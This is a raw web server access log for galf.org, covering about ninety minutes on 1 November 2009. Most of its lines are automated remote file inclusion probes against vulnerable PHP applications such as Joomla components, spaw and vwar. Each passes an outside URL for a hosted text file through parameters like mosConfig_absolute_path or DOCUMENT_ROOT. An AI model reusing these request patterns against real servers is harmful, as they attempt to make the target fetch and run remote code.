114.108.177.238 - - [01/Nov/2009:16:53:26 -0800] "GET /logs//bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:53:26 -0800] "GET /bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:53:29 -0800] "GET /logs/access.log%20%20//bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:56:41 -0800] "GET /logs//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:56:41 -0800] "GET /bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:56:48 -0800] "GET /logs/access_090921.log//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:58:39 -0800] "GET /logs/access_090921.log//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:59:55 -0800] "GET /logs/access_090504.log//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:59:55 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:59:55 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:17:05:21 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:07:09 -0800] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:07:09 -0800] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:07:09 -0800] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:12:28 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.230.81.124 - - [01/Nov/2009:17:12:28 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.230.81.124 - - [01/Nov/2009:17:12:29 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
91.192.20.164 - - [01/Nov/2009:17:16:30 -0800] "GET /bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:17:16:30 -0800] "GET /logs//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:17:16:33 -0800] "GET /logs/access_090921.log//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.134 - - [01/Nov/2009:17:22:42 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.134 - - [01/Nov/2009:17:24:40 -0800] "GET /?S=A HTTP/1.1" 200 1048 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:13 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:14 -0800] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:14 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:18 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:18 -0800] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:19 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:28 -0800] "GET /logs/access_090824.log/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:28 -0800] "GET /?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:25:29 -0800] "GET /logs/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 200 4942 "-" "libwww-perl/5.79" "www.galf.org"
65.55.51.110 - - [01/Nov/2009:17:26:44 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:27:33 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.230.81.124 - - [01/Nov/2009:17:27:33 -0800] "GET /logs/access.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
87.230.81.124 - - [01/Nov/2009:17:27:35 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
65.55.51.110 - - [01/Nov/2009:17:27:51 -0800] "GET /labia/?D=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:29:16 -0800] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:29:16 -0800] "GET /logs/access.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:29:16 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:29:16 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:29:16 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:29:16 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.111.213.195 - - [01/Nov/2009:17:29:50 -0800] "GET /logs/access_090518.log/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:29:50 -0800] "GET /logs/access_090518.log/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.111.213.195 - - [01/Nov/2009:17:29:52 -0800] "GET /logs/access_090518.log/?DOCUMENT_ROOT=http://www.hotlinkfiles.com/files/2361651_3xu3n/id22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:17:30:53 -0800] "GET /logs/access_090309.log//snippet.reflect.php?reflect_base=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:17:30:53 -0800] "GET /logs//snippet.reflect.php?reflect_base=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:17:30:53 -0800] "GET /snippet.reflect.php?reflect_base=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:17:31:34 -0800] "GET /logs/access_090914.log//snippet.reflect.php?reflect_base=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:17:32:04 -0800] "GET /logs/access.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://mysistersjewelry.net/wp-content/uploads/2009/04/idxx.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:32:09 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
64.34.111.74 - - [01/Nov/2009:17:32:26 -0800] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
174.120.175.4 - - [01/Nov/2009:17:33:48 -0800] "GET /logs/access_090309.log%20//snippet.reflect.php?reflect_base=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:17:33:48 -0800] "GET /logs/access_091012.log%20//snippet.reflect.php?reflect_base=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:36:56 -0800] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:36:56 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:36:56 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:37:12 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:37:12 -0800] "GET /logs/access_090713.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.34.111.74 - - [01/Nov/2009:17:37:12 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.eminlife.com/rss/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:37:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:37:13 -0800] "GET /logs/access_090413.log//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:37:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.0" 200 1032 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:37:14 -0800] "GET /logs/access_090413.log//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:37:15 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:37:16 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
65.55.207.52 - - [01/Nov/2009:17:37:44 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:40:37 -0800] "GET /logs/access_090413.log//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:40:37 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:40:37 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
67.195.115.176 - - [01/Nov/2009:17:41:26 -0800] "GET /cendoc/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:43:13 -0800] "GET /index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:43:13 -0800] "GET /logs/access_090413.log//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:43:13 -0800] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:47:57 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:48:00 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:48:07 -0800] "GET /logs/access_090727.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:48:21 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:48:21 -0800] "GET /logs/access_090727.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:48:42 -0800] "GET /logs/access_090713.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:48:43 -0800] "GET /logs/access_090713.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:14 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:14 -0800] "GET /logs/access_090727.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:36 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:40 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:41 -0800] "GET /logs/access_090713.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:42 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:42 -0800] "GET /logs/access_090810.log//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
208.89.214.167 - - [01/Nov/2009:17:49:45 -0800] "GET /logs/access_090810.log//modules/vwar/admin/admin.php?vwar_root=http://homesprings.co.kr/plugins/logs/gue/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:17:55:03 -0800] "GET /logs/access_090413.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [01/Nov/2009:17:57:26 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [01/Nov/2009:17:57:26 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [01/Nov/2009:17:57:47 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [01/Nov/2009:17:57:47 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [01/Nov/2009:17:57:47 -0800] "GET /logs/access.log%20%20//modules/xfsection/modify.php?dir_module=http://www.seorakhoney.com/shop/mail/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
213.3.26.176 - - [01/Nov/2009:17:57:48 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:17:57:48 -0800] "GET /logs/access_091012.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:04:14 -0800] "GET /logs/access.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.44.162 - - [01/Nov/2009:18:04:14 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.44.162 - - [01/Nov/2009:18:04:14 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
69.175.44.162 - - [01/Nov/2009:18:05:02 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:05:02 -0800] "GET /logs/access_090504.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:05:02 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.pacificdxpedition.com/images/baner.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:05:46 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
69.175.44.162 - - [01/Nov/2009:18:08:40 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:10:25 -0800] "GET /logs/access.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
69.175.44.162 - - [01/Nov/2009:18:10:25 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
69.175.44.162 - - [01/Nov/2009:18:10:25 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "galf.org"
87.230.81.124 - - [01/Nov/2009:18:12:37 -0800] "GET /logs/access_090525.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:18:14:43 -0800] "GET /logs/access_090525.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:17:27 -0800] "GET /logs/access_090504.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:17:27 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
69.175.44.162 - - [01/Nov/2009:18:17:27 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.shoppingxxxsource.com/pandegaid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.832" "www.galf.org"
65.55.230.210 - - [01/Nov/2009:18:21:32 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:18:22:40 -0800] "GET /logs//e404.php?DOCUMENT_ROOT=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:18:22:40 -0800] "GET /e404.php?DOCUMENT_ROOT=http://diablodimesmusic.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
211.47.69.100 - - [01/Nov/2009:18:25:17 -0800] "GET /logs/scripts.log//?pag=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.47.69.100 - - [01/Nov/2009:18:25:17 -0800] "GET /logs//?pag=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
211.47.69.100 - - [01/Nov/2009:18:25:17 -0800] "GET /?pag=http://www.displayplus.net/bbs//id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.230.81.124 - - [01/Nov/2009:18:27:13 -0800] "GET /logs/access_090615.log//?_SERVER[DOCUMENT_ROOT]=http://casey.jp/backend/gieforceid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
